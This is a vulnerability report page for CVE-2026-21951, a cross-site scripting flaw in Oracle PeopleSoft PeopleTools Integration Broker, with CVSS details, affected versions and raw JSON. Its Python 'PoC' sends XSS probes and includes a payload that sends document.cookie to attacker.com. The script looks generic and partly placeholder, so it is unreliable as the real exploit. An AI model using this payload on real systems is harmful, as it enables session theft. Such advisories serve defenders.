Security Vulnerability Report
CVE-2026-21951 CVSS 6.1 MEDIUM

CVE-2026-21951

Published: 2026-01-20 22:15:58
Last Modified: 2026-01-29 20:59:18

Description

Vulnerability in the PeopleSoft Enterprise PeopleTools product of Oracle PeopleSoft (component: Integration Broker). Supported versions that are affected are 8.60, 8.61 and 8.62. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise PeopleSoft Enterprise PeopleTools. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in PeopleSoft Enterprise PeopleTools, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of PeopleSoft Enterprise PeopleTools accessible data as well as unauthorized read access to a subset of PeopleSoft Enterprise PeopleTools accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N).

CVSS Details

CVSS Score: 6.1
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Weakness: CWE-79 (Cross-site Scripting)

Configurations (Affected Products)

cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.60:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.61:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.62:*:*:*:*:*:*:* - VULNERABLE
Oracle PeopleSoft Enterprise PeopleTools 8.60
Oracle PeopleSoft Enterprise PeopleTools 8.61
Oracle PeopleSoft Enterprise PeopleTools 8.62

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# CVE-2026-21951 PoC - PeopleSoft Integration Broker Exploitation
# Target: Oracle PeopleSoft Enterprise PeopleTools
# Affected Versions: 8.60, 8.61, 8.62

TARGET_URL = "https://vulnerable-server/psp/ps/".replace("vulnerable-server", "TARGET_HOST")
CVE_ID = "CVE-2026-21951"

# Shared request headers. Defined at module level so both functions can use them
# (the original defined them only inside check_vulnerability(), which left
# exploit_integration_broker() with a NameError).
headers = {
    "User-Agent": "Mozilla/5.0 (compatible; CVE-2026-21951-scanner)",
    "Content-Type": "application/x-www-form-urlencoded",
}


def check_vulnerability():
    """Check if target is vulnerable to CVE-2026-21951"""
    # Step 1: Identify Integration Broker endpoint
    ib_endpoints = [
        "/psc/ps/EMPLOYEE/HRMS/c/IB_OPR_MGMT.IB_ENDPOINT_LKP.GBL",
        "/psc/ps/EMPLOYEE/HRMS/c/IB_OPR_MGMT.IB_SERVICE_LKP.GBL",
        "/psc/ps/EMPLOYEE/HRMS/c/IB_OPR_MGMT.IB_ROUTING_LKP.GBL",
    ]

    # Step 2: Test for XSS in Integration Broker parameters
    xss_payload = "<script>alert('CVE-2026-21951')</script>"

    for endpoint in ib_endpoints:
        try:
            # Step 3: Send test request with XSS payload
            response = requests.get(
                TARGET_URL + endpoint,
                params={"IB_XSS_TEST": xss_payload},
                headers=headers,
                timeout=30,
                verify=False,
            )
            # Step 4: Check if payload is reflected without sanitization
            if xss_payload in response.text:
                print(f"[+] Potential vulnerability found at {endpoint}")
                print("[+] Payload reflected - XSS may be exploitable")
                return True
        except requests.RequestException as e:
            print(f"[-] Error testing {endpoint}: {e}")

    return False


def exploit_integration_broker():
    """Attempt exploitation of Integration Broker vulnerability"""
    # Malicious payload for data extraction
    exploit_payload = {
        "IB_SERVICE_NAME": "XSS_PAYLOAD_HERE",
        "IB_ROUTING": "<img src=x onerror='fetch(\"https://attacker.com/log?c=\"+document.cookie)'>",
        "OPRID": "test",
        "PASSWORD": "test",
    }
    try:
        response = requests.post(
            TARGET_URL + "/psc/ps/EMPLOYEE/HRMS/c/IB_OPR_MGMT.IB_SERVICE_LKP.GBL",
            data=exploit_payload,
            headers=headers,
            timeout=30,
            verify=False,
        )
        return response.status_code == 200
    except requests.RequestException:
        return False


if __name__ == "__main__":
    print(f"[*] Scanning for {CVE_ID}")
    print(f"[*] Target: {TARGET_URL}")
    if check_vulnerability():
        print(f"[!] Target appears vulnerable to {CVE_ID}")
        print("[!] Consider testing with authenticated session")
    else:
        print("[*] No obvious vulnerability detected")

References

https://www.oracle.com/security-alerts/cpujan2026.html (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-21951", "sourceIdentifier": "[email protected]", "published": "2026-01-20T22:15:58.110", "lastModified": "2026-01-29T20:59:17.973", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in the PeopleSoft Enterprise PeopleTools product of Oracle PeopleSoft (component: Integration Broker). Supported versions that are affected are 8.60, 8.61 and 8.62. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise PeopleSoft Enterprise PeopleTools. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in PeopleSoft Enterprise PeopleTools, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of PeopleSoft Enterprise PeopleTools accessible data as well as unauthorized read access to a subset of PeopleSoft Enterprise PeopleTools accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)."}, {"lang": "es", "value": "Vulnerabilidad en el producto PeopleSoft Enterprise PeopleTools de Oracle PeopleSoft (componente: Integration Broker). Versiones compatibles que están afectadas son 8.60, 8.61 y 8.62. Vulnerabilidad fácilmente explotable permite a un atacante no autenticado con acceso de red vía HTTP comprometer PeopleSoft Enterprise PeopleTools. Ataques exitosos requieren interacción humana de una persona distinta al atacante y aunque la vulnerabilidad está en PeopleSoft Enterprise PeopleTools, los ataques pueden impactar significativamente productos adicionales (cambio de alcance). Ataques exitosos de esta vulnerabilidad pueden resultar en acceso no autorizado de actualización, inserción o eliminación a algunos de los datos accesibles de PeopleSoft Enterprise PeopleTools así como acceso de lectura no autorizado a un subconjunto de los datos accesibles de PeopleSoft Enterprise PeopleTools. Puntuación Base CVSS 3.1 de 6.1 (impactos en Confidencialidad e Integridad). Vector CVSS: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.60:*:*:*:*:*:*:*", "matchCriteriaId": "AF191D4F-3D54-4525-AAF5-B70D3FD2F818"}, {"vulnerable": true, "criteria": "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.61:*:*:*:*:*:*:*", "matchCriteriaId": "18F15FC6-947A-462A-8329-C52907799A7C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.62:*:*:*:*:*:*:*", "matchCriteriaId": "FF0E4EFC-096B-4861-8D55-D8DAA37A21E9"}]}]}], "references": [{"url": "https://www.oracle.com/security-alerts/cpujan2026.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}